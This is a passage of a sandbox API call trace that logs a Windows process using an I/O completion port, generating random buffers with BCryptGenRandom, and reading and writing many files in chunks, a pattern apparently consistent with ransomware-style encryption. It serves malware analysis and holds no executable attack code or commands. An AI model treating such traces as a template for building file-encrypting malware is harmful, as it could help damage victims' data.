dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.371] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.371] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.371] free (_Block=0x3e305b8) [0139.371] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.371] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.372] free (_Block=0x1fa91d0) [0139.372] free (_Block=0x77d7a8) [0139.372] free (_Block=0x1fa90b8) [0139.372] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.373] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x69d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.385] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbcfc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.398] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbd04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.413] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4330, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.414] CloseHandle (hObject=0x170) returned 1 [0139.414] free (_Block=0x3df0008) [0139.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.424] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.424] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.424] free (_Block=0x3e305b8) [0139.424] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.424] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.425] free (_Block=0x1fa91d0) [0139.425] free (_Block=0x77d7a8) [0139.425] free (_Block=0x1fa90b8) [0139.425] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.426] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.437] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4ea8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.449] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3490, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.556] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5804, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.569] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x571c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.583] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x614c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.649] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3ee4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.804] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0140.415] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x26f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.420] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4ef4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.436] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2168, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.437] CloseHandle (hObject=0x170) returned 1 [0141.438] free (_Block=0x3df0008) [0141.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0141.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0141.447] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.447] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.447] free (_Block=0x3e305b8) [0141.447] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.447] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.447] free (_Block=0x1fa91d0) [0141.448] free (_Block=0x77d7a8) [0141.448] free (_Block=0x1fa90b8) [0141.448] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.448] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.450] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.461] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.462] CloseHandle (hObject=0x170) returned 1 [0141.463] free (_Block=0x3df0008) [0141.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0141.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0141.508] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.508] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.508] free (_Block=0x3e305b8) [0141.508] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.508] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.509] free (_Block=0x1fa91d0) [0141.509] free (_Block=0x77d7a8) [0141.509] free (_Block=0x1fa90b8) [0141.509] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0141.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0141.521] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.521] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.521] free (_Block=0x3e305b8) [0141.521] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.521] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.522] free (_Block=0x1fa91d0) [0141.522] free (_Block=0x77d7a8) [0141.522] free (_Block=0x1fa90b8) [0141.522] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.522] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0141.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0141.544] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.544] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.544] free (_Block=0x3e305b8) [0141.544] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.544] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.545] free (_Block=0x1fa91d0) [0141.545] free (_Block=0x77d7a8) [0141.545] free (_Block=0x1fa90b8) [0141.545] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0141.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.556] CloseHandle (hObject=0x170) returned 1 [0141.556] free (_Block=0x3df0008) [0141.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0141.570] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x347c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0141.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.450] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xd910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.497] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x67a3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0147.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.708] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.708] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.708] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.708] free (_Block=0x3e305b8) [0147.708] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.708] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.709] free (_Block=0x1fa91d0) [0147.709] free (_Block=0x1fa2ed8) [0147.709] free (_Block=0x1fa90b8) [0147.709] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.709] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.723] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.723] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.723] free (_Block=0x3e305b8) [0147.723] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.723] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.724] free (_Block=0x1fa91d0) [0147.724] free (_Block=0x1fa2ed8) [0147.724] free (_Block=0x1fa90b8) [0147.724] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0147.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0147.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0147.735] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.735] free (_Block=0x3e305b8) [0147.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.735] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.735] free (_Block=0x1fa91d0) 